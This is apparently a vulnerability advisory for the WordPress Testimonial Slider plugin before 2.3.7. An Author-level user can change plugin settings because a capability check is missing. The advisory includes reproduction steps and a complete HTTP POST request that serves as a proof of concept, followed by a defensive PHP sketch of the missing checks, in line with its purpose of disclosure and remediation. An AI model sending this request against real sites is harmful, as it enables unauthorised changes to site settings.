wpexploit
Dmitrii Ignatyev
WPEX-ID:B63BBFEB-D6F7-4C33-8824-B86D64D3F598
Mar 05, 2024 - 12:00 a.m.

Testimonial Slider < 2.3.7 - Author+ Settings Update


AI Score: 9.5 High
Confidence: High
EPSS: 0.0004 Low
Percentile: 9.1%

Description

The plugin does not properly ensure that a user has the necessary capabilities to edit certain sensitive plugin settings, making it possible for users with at least the Author role to edit them.

1) Go to a page where one of the sliders is already in use and intercept the nonce `tss`
2) Insert the found nonce and cookies into the request to change the plugin settings

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: Author+
Content-Length: 144
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

slug=updatedButShouldntBe&tss_nonce=30fd47c1fe&action=tssSettingsAction
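
The server-side checks whose absence the description reports, sketched as an added example that is not the plugin's own code or its actual fix. Only the `tssSettingsAction` action and the `tss_nonce` parameter come from the request above; the handler name, option name, nonce action string and required capability are assumptions.

```php
<?php
/**
 * Added illustration, not the Testimonial Slider source.
 * Assumed names: tss_example_save_settings(), the 'tss_example_settings'
 * option, the 'tss_nonce_action' nonce action and the 'manage_options'
 * capability chosen as the requirement.
 */

// wp_ajax_{action} fires for ANY logged-in user (Subscriber, Author, ...),
// so registering the hook is not an authorization check by itself.
add_action( 'wp_ajax_tssSettingsAction', 'tss_example_save_settings' );

function tss_example_save_settings() {
    // 1. Nonce check: protects against forged cross-site requests.
    //    A nonce is delivered to the browser in page markup, so a valid
    //    one says nothing about what the user is allowed to do.
    if ( ! check_ajax_referer( 'tss_nonce_action', 'tss_nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // 2. Capability check: the authorization step the description says
    //    is not properly enforced. Authors do not hold manage_options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Accept only known setting keys and sanitize each value, so the
    //    request body cannot write arbitrary keys into the option.
    $allowed  = array( 'slug' );
    $settings = (array) get_option( 'tss_example_settings', array() );
    foreach ( $allowed as $key ) {
        if ( isset( $_POST[ $key ] ) ) {
            $settings[ $key ] = sanitize_text_field( wp_unslash( $_POST[ $key ] ) );
        }
    }

    update_option( 'tss_example_settings', $settings );
    wp_send_json_success( array( 'updated' => array_keys( $settings ) ) );
}
```

With the capability check in place, the request above sent with an Author session returns a 403 JSON error even when the nonce is valid.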
